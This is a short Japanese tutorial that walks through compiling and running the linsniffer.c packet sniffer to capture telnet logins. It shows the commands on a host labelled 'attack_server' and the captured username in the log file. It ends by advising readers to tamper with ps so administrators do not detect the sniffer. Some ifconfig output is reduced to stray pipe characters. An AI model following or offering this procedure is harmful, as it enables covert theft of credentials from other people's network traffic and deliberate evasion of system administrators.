■スニーファー
普通は、NIC(Network Interface Card)の設定によりパケットを覗き見ることができません。そのために、設定を変更する必要があります。
しかし、スイッチングハブが回線の途中に使われている場合、スニーフィングは成功しないだろう。なぜならば、スイッチがパケットを処理して、相手にだけしか送らない様にしているからである。
■スニーファー・スクリプトをコンパイルして実行してみよう。
1、各自のプラットフォームに合わせたスニーファー・スクリプトを準備する。
ここでは、linsniffer.cを使ってみましょう。
2、ifconfig でデバイスを確認する。
|
|
|
|
|
|
BROADCAST RUNNING MULTICAST。この状態の場合であれば、パケットの中身を覗くことができない。
それでSnifferは、この個所を Promiscuous Modeに変更する。後で確認してみよう。
3、スクリプトを開いて、辻の部分に注目しよう。
if(ntohs(tcp->dest)==23) p=1; /* telnet */
見つけられただろうか。これは、対象ポートをtelnetである23に設定している。これで覗くパケットはTCPポートが23だけのものになる。
4、Libcapというライブラリを用意して、インストールする。
5、これで、スクリプトをコンパイルする準備ができた。
attack_server# cc linsniffer.c
attack_server# mv ./a.out linsniffer
attack_server# ./linsniffer &
[1] 6878
これで、コンパイルされたでしょう。
6、ifconfigする。
さて、これでとりあえず終了。ifconfig をしてみよう。
|
|
|
|
|
|
7、現在の設定では、./sniffing というファイルにログが作成されていく。では、ちょっと試しにtelnetを起動させてみよう。
attack_server# telnet 192.168.1.1 23
Welcome to Linux 2.0.34
ipusiron login: guest
password: *****
attack_server# cat /tmp/sniffing
192.168.1.1 => 192.168.1.1 [23]
#'Pvt100!guest
guest
cat /tmp/sniffing
■最後に
管理者側にばれないように、psを細工しましょう(詳しくは、特別講座<ps編>を参照せよ)。細工しないと、管理者にもろばれですので。
■参考文献
|
|||
|
|